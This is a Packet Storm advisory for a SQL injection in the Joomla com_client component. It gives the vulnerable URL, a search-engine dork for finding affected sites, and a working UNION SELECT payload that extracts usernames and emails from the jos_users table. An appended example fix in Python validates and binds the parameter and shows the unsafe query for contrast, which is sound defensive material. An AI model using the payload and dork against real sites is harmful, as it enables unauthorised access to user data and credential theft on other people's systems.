packetstorm / Fl0riX / PACKETSTORM:98683
History: Feb 23, 2011 - 12:00 a.m.

Joomla Client SQL Injection

`  
<------------------- header data start ------------------- >  
#############################################################  
Joomla Component client SQL Injection Vulnerability   
#############################################################  
  
# Author : Fl0riX ~ Bug Researchers  
  
# Name : Joomla com_client  
  
# Bug Type : SQL injection  
  
# Infection : Admin login credentials can be obtained.  
  
# Demo Vuln :  
[+]/index.php?option=com_client&task=category&prf=fl0&catid=1[EXPLOIT]  
  
[+] Dork: inurl:"index.php?option=com_client"  
  
# Bug Fix Advice : Harmful characters must be filtered.  
#############################################################  
< ------------------- header data end of ------------------- >  
< -- bug code start -- >  
EXPLOIT :  
+and+1=2+union+select+1,concat(username,0x3a,email)fl0rix,3,4,5,6+from+jos_users--  
< -- bug code end of -- >   
  
`
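One way to apply the bug-fix advice above, as an added example that is not part of the original advisory or the component's code: it goes further than character filtering by allow-listing `catid` as an integer and binding it as a query parameter. The table `jos_client_items`, its columns and all function names are hypothetical, and SQLite stands in for the site's database.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Constructed request: the advisory's demo URL with its payload appended to catid.
REQUEST = ("/index.php?option=com_client&task=category&prf=fl0&catid=1"
           "+and+1=2+union+select+1,concat(username,0x3a,email)fl0rix,3,4,5,6"
           "+from+jos_users--")

def make_db():
    # Constructed stand-in schema: the component's real tables are not shown in the advisory.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE jos_client_items (id INTEGER, title TEXT, catid INTEGER);
        INSERT INTO jos_client_items VALUES (1, 'Item one', 1), (2, 'Item two', 2);
    """)
    return db

def raw_catid(url):
    # parse_qs decodes '+' to a space, as the web server would before the component sees it.
    return parse_qs(urlsplit(url).query).get("catid", [""])[0]

def unsafe_sql(catid):
    # The flaw, shown for contrast and never executed: request data becomes statement text.
    return "SELECT id, title FROM jos_client_items WHERE catid = " + catid

def parse_catid(value):
    # Allow-list: catid is a numeric key, so accept 1 to 9 digits and nothing else.
    if not re.fullmatch(r"[0-9]{1,9}", value):
        raise ValueError("catid must be a positive integer")
    return int(value)

def items_bound(db, catid):
    # Bound parameter: the value is data only and can never become SQL syntax.
    return db.execute(
        "SELECT id, title FROM jos_client_items WHERE catid = ?", (catid,)).fetchall()

def handle(db, url):
    # Validate first, then query with a bound parameter; reject anything else with 400.
    try:
        return 200, items_bound(db, parse_catid(raw_catid(url)))
    except ValueError:
        return 400, []
```

Calling `unsafe_sql(raw_catid(REQUEST))` shows the appended `union select` becoming part of the statement, while `handle(make_db(), REQUEST)` rejects the same request before any query runs.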